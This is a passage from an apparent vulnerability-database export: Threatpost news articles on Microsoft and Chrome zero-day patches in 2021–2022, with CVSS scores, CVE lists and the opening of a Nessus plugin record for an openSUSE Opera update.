and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,\u201d they continued. \u201cThis dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.\u201d\n\nBoris Larin, senior security researcher with Kaspersky\u2019s Global Research and Analysis Team (GReAT), said that the team hasn\u2019t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape \u201cfor future activity or new insights about this group,\u201d he was quoted as saying in the press release.\n\nIf the current trend is any indication, expect to see more of the same, Larin said. \u201cOverall, of late, we\u2019ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,\u201d he said. \u201cIt\u2019s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it\u2019s possible that we\u2019ll see an increase of their usage in attacks by this and other threat actors. That means it\u2019s very important for users to download the latest patch from Microsoft as soon as possible.\u201d\n\n## CVE-2021-31199/CVE-2021-31201\n\nThe two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. \u201cIt\u2019s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,\u201d he explained. \u201cIt is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.\u201d\n\n## CVE-2021-33739\n\nBreen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. \u201cOnce they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,\u201d he said. \u201cThis can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-06-08T21:45:12", "type": "threatpost", "title": "Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:45:12", "id": "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "href": "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-14T15:21:25", "description": "Google has addressed two zero-day security bugs that are being actively exploited in the wild.\n\nAs part of the internet giant\u2019s latest stable channel release (version 93.0.4577.82 for Windows, Mac and Linux), it fixed 11 total vulnerabilities, all of them rated high-severity. The two zero days are tracked as CVE-2021-30632 and CVE-2021-30633.\n\n\u201cGoogle is aware that exploits for [these] exist in the wild,\u201d the company said in its short website notice on the update, [issued Monday](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nGoogle is restricting any technical details \u201cuntil a majority of users are updated with a fix,\u201d it said. The vulnerabilities were reported anonymously, precluding any gleaning of details from the researcher who found them. Here\u2019s what we know:\n\n * CVE-2021-30632: Out of bounds write in V8 JavaScript Engine; and\n * CVE-2021-30633: Use after free in the IndexedDB API.\n\nOut-of-bounds write flaws [can result in](<https://cwe.mitre.org/data/definitions/787.html>) corruption of data, a crash or code execution. Use-after-free issues [can result in](<https://cwe.mitre.org/data/definitions/416.html>) any number of attack types, ranging from the corruption of valid data to the execution of arbitrary code. Both bugs have TBD bug-bounty awards attached to them and were reported on Sept. 8.\n\nV8 is Google\u2019s open-source, high-performance JavaScript and WebAssembly engine for Chrome and Chromium-based browsers. It translates JavaScript code into a more efficient machine code instead of using an interpreter, which speeds up the web browser. Since this vulnerable components is not specific to Google Chrome, it\u2019s a good bet that other browsers are affected by the bug as well.\n\nIndexedDB, meanwhile, allows users to persistently store large amounts of structured data client-side, inside their browsers. The API is a JavaScript application programming interface provided by web browsers for managing these NoSQL databases. It\u2019s a standard maintained by the World Wide Web Consortium.\n\n\u201cBrowser bugs discovered from exploitation in the wild are among the most significant security threats,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cNow that they are patched, exploitation will ramp up. That said, almost 20 years on and we haven\u2019t made web browsing safe shows that the rapid embrace of technology continues to leave users exposed to criminals and nation-state actors. Everyone wants to learn how to hack, too few people are working on defense.\u201d\n\nThe other nine bugs addressed by Google are as follows:\n\n * CVE-2021-30625: Use after free in Selection API. _Reported by Marcin Towalski of Cisco Talos on 2021-08-06_\n * CVE-2021-30626: Out of bounds memory access in ANGLE. _Reported by Jeonghoon Shin of Theori on 2021-08-18_\n * CVE-2021-30627: Type Confusion in Blink layout. _Reported by Aki Helin of OUSPG on 2021-09-01_\n * CVE-2021-30628: Stack buffer overflow in ANGLE. _Reported by Jaehun Jeong(@n3sk) of Theori on 2021-08-18_\n * CVE-2021-30629: Use after free in Permissions. _Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi\u2019anxin Group on 2021-08-26_\n * CVE-2021-30630: Inappropriate implementation in Blink. _Reported by SorryMybad (@S0rryMybad) of Kunlun Lab on 2021-08-30_\n * CVE-2021-30631: Type Confusion in Blink layout. _Reported by Atte Kettunen of OUSPG on 2021-09-06_\n\nKevin Dunne, president at Pathlock, pointed out that Google has patched plenty of zero-days already this year \u2013 eight prior to the latest two, to be exact \u2013 and he said to expect more.\n\n## **10th Zero-Day in 2021 for Google**\n\n\u201cToday, Google released a patch for its tenth [and ninth] zero-day exploit of the year,\u201d Dunne said in an email to media. \u201cThis milestone highlights the emphasis that bad actors are putting on browser exploits, with Chrome becoming a clear favorite, allowing a streamlined way to gain access to millions of devices regardless of OS.\n\n\u201cWe expect to see continued zero-day exploits in the wild,\u201d he added.\n\nThe other zero days discovered so far in 2021 are as follows, many of them in the V8 engine:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 (February)\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 (March)\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 (March)\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 (April)\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 (April, later [used in Windows attacks](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>))\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013 (June)\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 (June)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 (July)\n\n\u201cGoogle\u2019s commitment to patching these exploits quickly is commendable, as they operate Google Chrome as freeware and therefore are the sole entity who can provide these updates,\u201d Dunne wrote. \u201cGoogle is committed to providing Chrome as a free browser, as it is a critical entry point for other businesses such as Google Search and Google Workspace.\u201d\n\nThe news comes as Apple [rushed a fix](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) for a zero-click zero-day exploit targeting iMessaging. It\u2019s allegedly been used to illegally spy on Bahraini activists with NSO Group\u2019s Pegasus spyware, according to researchers.\n\nMicrosoft is also expected to release its monthly Patch Tuesday set of updates today, so we\u2019ll see if there are yet more zero-day exploits to worry about.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T15:03:41", "type": "threatpost", "title": "Pair of Google Chrome Zero-Day Bugs Actively Exploited", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30625", "CVE-2021-30626", "CVE-2021-30627", "CVE-2021-30628", "CVE-2021-30629", "CVE-2021-30630", "CVE-2021-30631", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T15:03:41", "id": "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "href": "https://threatpost.com/google-chrome-zero-day-exploited/169442/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-15T21:47:28", "description": "Google on Monday issued 11 security fixes for its Chrome browser, including a high-severity zero-day bug that\u2019s actively being jumped on by attackers in the wild.\n\nIn a brief update, Google [described](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>) the weakness, tracked as [CVE-2022-0609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609>), as a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in Chrome\u2019s Animation component. This kind of flaw can lead to all sorts of misery, ranging from the corruption of valid data to the execution of arbitrary code on vulnerable systems. Such flaws can also be used to escape the browser\u2019s security sandbox.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2022-0609 exists in the wild,\u201d according to its security update.\n\nChrome users can fix it straight away, though, by going into the Chrome menu > Help > About Google Chrome.\n\nGiven that the zero day is under active attack, updating Chrome should be done ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15125804/Chrome-zero-day-e1644947947750.png>)\n\nChrome security updates. Source: Google.\n\nCredit for the Animation zero day goes to Adam Weidemann and Cl\u00e9ment Lecigne, both from Google\u2019s Threat Analysis Group (TAG).\n\nMonday\u2019s update also plastered over four other high-severity use-after-free flaws found in Chrome\u2019s Webstore API, File Manager, [ANGLE](<https://en.wikipedia.org/wiki/ANGLE_\\(software\\)>) and GPU. As well, the company addressed a high-severity integer overflow in [Mojo](<https://chromium.googlesource.com/chromium/src/+/main/docs/mojo_and_services.md>), plus a high-severity h\u200beap buffer overflow in Tab Groups. Finally, Google patched a medium-severity issue with inappropriate implementation in Gamepad API.\n\n## And So It Begins\n\nThis is Chrome\u2019s first zero day of the year, and more are sure to follow. But at least we\u2019ve made it into the new-ish year 10 more days than we managed in 2021, when the first bug to hit arrived on Feb. 4.\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, a vulnerability in its V8 open-source web engine.\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 March 2, a flaw in the Audio component of Google Chrome.\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 March 12, a use-after-free flaw in Blink, [the browser engine for Chrome](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>) that was developed as part of the Chromium project.\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 April 13, a remote-code execution issue.\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 in Google Chrome that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013- June 9, a type confusion bug within Google\u2019s V8 open-source JavaScript and WebAssembly engine.\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 June 17, a use-after-free bug.\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, type confusion in V8.\n * [CVE-2021-30632 and CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8 and a use-after-free bug in the IndexedDB API, respectively.\n * [CVE-2021-37973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37973>) \u2013 Sept. 24, a use-after-free flaw in Portals.\n * [CVE-2021-37976 and CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, an information leak in core and a use-after-free bug in V8, respectively.\n * [CVE-2021-38000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38000>) and [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an issue with Insufficient validation of untrusted input in Intents in Google Chrome on Android, and an inappropriate implementation in V8 respectively.\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use after free in V8.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T18:33:28", "type": "threatpost", "title": "Chrome Zero-Day Under Active Attack: Patch ASAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-02-15T18:33:28", "id": "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "href": "https://threatpost.com/google-chrome-zero-day-under-attack/178428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T16:18:23", "description": "Google has updated its Stable channel for the desktop version of Chrome, to address a zero-day security vulnerability that\u2019s being actively exploited in the wild.\n\nThe bug, tracked as CVE-2022-1096, is a type-confusion issue in the V8 JavaScript engine, which is an open-source engine used by Chrome and Chromium-based web browsers. Type confusion, as Microsoft has [laid out](<https://www.microsoft.com/security/blog/2015/06/17/understanding-type-confusion-vulnerabilities-cve-2015-0336/>) in the past, occurs \u201cwhen a piece of code doesn\u2019t verify the type of object that is passed to it, and uses it blindly without type-checking, it leads to type confusion\u2026Also with type confusion, wrong function pointers or data are fed into the wrong piece of code. In some circumstances this can lead to code execution.\u201d\n\nGoogle didn\u2019t provide additional technical details, as is its wont, but did say that it was \u201caware that an exploit for CVE-2022-1096 exists in the wild.\u201d An anonymous researcher was credited with finding the issue, which is labeled \u201chigh-severity\u201d (no CVSS score was given).\n\nThe lack of any further information is a source of frustration to some.\n\n\u201cAs a defender, I really wish it was more clear what this security fix is,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cI get permission-denied errors or \u2018need to authenticate,\u2019 so I can\u2019t make decisions or advise my clients. A little more transparency would be beneficial and appreciated.\u201d\n\n## **Emergency Patch; Active Exploit**\n\nThe internet giant has updated the Stable channel to 99.0.4844.84 for Chrome for Windows, Mac and Linux, according to the its [security advisory](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>). Microsoft, which offers the Chromium-based Edge browser, also issued its [own advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>). It\u2019s unclear whether other offerings built in V8, such as the JavaScript runtime environment Node.js, are also affected.\n\nThe patch was issued on an emergency basis, likely due to the active exploit that\u2019s circulating, researchers noted.\n\n\u201cThe first thing which stood out to me about this update is that it only fixes a single issue,\u201d Casey Ellis, founder and CTO at Bugcrowd, noted by email. \u201cThis is pretty unusual for Google. They typically fix multiple issues in these types of releases, which suggests that they are quite concerned and very motivated to see fixes against CVE-2022-1096 applied across their user-base ASAP.\u201d\n\nHe also commented on the speed of the patch being rolled out.\n\n\u201cThe vulnerability was only reported on the 23rd of March, and while Google\u2019s Chrome team do tend to be fairly prompt in developing, testing and rolling patches, the idea of a patch for software deployed as widely deployed as Chrome in 48 hours is something is continue to be impressed by,\u201d he said. \u201cSpeculatively, I\u2019d suggest that the vulnerability has been discovered via detection of active exploitation in the wild, and the combination of impact and potentially the malicious actors currently using it contributed to the fast turnaround.\u201d\n\n## **V8 Engine in the Crosshairs**\n\nThe V8 engine has been plagued with security bugs and targeted by cyberattackers many times in the last year:\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, an unnamed type of bug in V8\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013- June 9, a type-confusion bug within V8 (also under active attack as a zero-day)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, another type-confusion bug in V8.\n * [CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8\n * [CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, a use-after-free bug in V8 (also attacked as a zero-day)\n * [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an inappropriate implementation in V8\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use-after-free bug in V8.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:14:30", "type": "threatpost", "title": "Google Chrome Bug Actively Exploited as Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0336", "CVE-2021-21148", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30563", "CVE-2021-30633", "CVE-2021-37975", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-1096"], "modified": "2022-03-30T16:14:30", "id": "THREATPOST:45B63C766965F5748AEC30DE709C8003", "href": "https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-13T14:39:19", "description": "This update for opera fixes the following issues :\n\nUpdate to version 76.0.4017.94\n\n - released on the stable branch\n\nUpdate to version 76.0.4017.88\n\n - CHR-8404 Update chromium on desktop-stable-90-4017 to 90.0.4430.85\n\n - DNA-92219 Add bookmark API supports to the front-end\n\n - DNA-92409 [MAC] ‘Present now’ options windows appear behind detached window\n\n - DNA-92615 Capture tab from the tab context menu\n\n - DNA-92616 Capture tab from Snapshot\n\n - DNA-92617 Capture tab from image context menu\n\n - DNA-92652 Opera 76 translations\n\n - DNA-92680 Make image selector on any page work like bookmarks popup WP2\n\n - DNA-92707 Crash at void base::ObserverList::AddObserver(class content::PrerenderHost::Observer*)\n\n - DNA-92710 Autoupdate on macOS 11.3 not working\n\n - DNA-92711 Make image selector on any page work like bookmarks popup WP3\n\n - DNA-92730 Make image selector on any page work like bookmarks popup WP4\n\n - DNA-92761 Make image selector on any page work like bookmarks popup WP5\n\n - DNA-92776 Make image selector on any page work like bookmarks popup WP6\n\n - DNA-92862 Make “View pinboards” button work\n\n - DNA-92906 Provide in-house translations for Cashback strings to Spanish\n\n - DNA-92908 API collides with oneclick installer\n\n - The update to chromium 90.0.4430.85 fixes following issues :\n\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224, CVE-2021-21225, CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\nUpdate to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to 89.0.4389.128\n\n - DNA-92113 Windows debug fails to compile opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n\n - DNA-92198 [Arm] Update signing scripts\n\n - DNA-92200 [Arm] Create universal packages from two buildsets\n\n - DNA-92338 [Search tabs] The preview isn’t updated when the tab from another window is closed\n\n - DNA-92410 [Download popup] Selected item still looks bad in dark mode\n\n - DNA-92441 Compilation error\n\n - DNA-92514 Allow to generate universal DMG package from existing universal .tar.xz\n\n - DNA-92608 Opera 75 crash during rapid workspace switching\n\n - DNA-92627 Crash at automation::Error::code()\n\n - DNA-92630 Crash at opera::PremiumExtensionPersistentPrefStorageImpl::IsPrem iumExtensionFeatureEnabled()\n\n - DNA-92648 Amazon icon disappears from Sidebar Extensions section after pressing Hide Amazon button\n\n - DNA-92681 Add missing string in Japanese\n\n - DNA-92684 Fix issues with signing multiple bsids\n\n - DNA-92706 Update repack generation from universal packages\n\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following issues: CVE-2021-21206, CVE-2021-21220", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-06-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2021-712)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-712.NASL", "href": "https://www.tenable.com/plugins/nessus/150103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-712.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150103);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2021-712)\");\n script_summary(english:\"Check for the openSUSE-2021-712 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for opera fixes the following issues :\n\nUpdate to version 76.0.4017.94\n\n - released on the stable branch\n\nUpdate to version 76.0.4017.88\n\n - CHR-8404 Update chromium on desktop-stable-90-4017 to\n 90.0.4430.85\n\n - DNA-92219 Add bookmark API supports to the front-end\n\n - DNA-92409 [MAC] ‘Present now’ options\n windows appear behind detached window\n\n - DNA-92615 Capture tab from the tab context menu\n\n - DNA-92616 Capture tab from Snapshot\n\n - DNA-92617 Capture tab from image context menu\n\n - DNA-92652 Opera 76 translations\n\n - DNA-92680 Make image selector on any page work like\n bookmarks popup WP2\n\n - DNA-92707 Crash at void\n base::ObserverList::AddObserver(class\n content::PrerenderHost::Observer*)\n\n - DNA-92710 Autoupdate on macOS 11.3 not working\n\n - DNA-92711 Make image selector on any page work like\n bookmarks popup WP3\n\n - DNA-92730 Make image selector on any page work like\n bookmarks popup WP4\n\n - DNA-92761 Make image selector on any page work like\n bookmarks popup WP5\n\n - DNA-92776 Make image selector on any page work like\n bookmarks popup WP6\n\n - DNA-92862 Make “View pinboards” button work\n\n - DNA-92906 Provide in-house translations for Cashback\n strings to Spanish\n\n - DNA-92908 API collides with oneclick installer\n\n - The update to chromium 90.0.4430.85 fixes following\n issues :\n\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224,\n CVE-2021-21225, CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\nUpdate to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to\n 89.0.4389.128\n\n - DNA-92113 Windows debug fails to compile\n opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n\n - DNA-92198 [Arm] Update signing scripts\n\n - 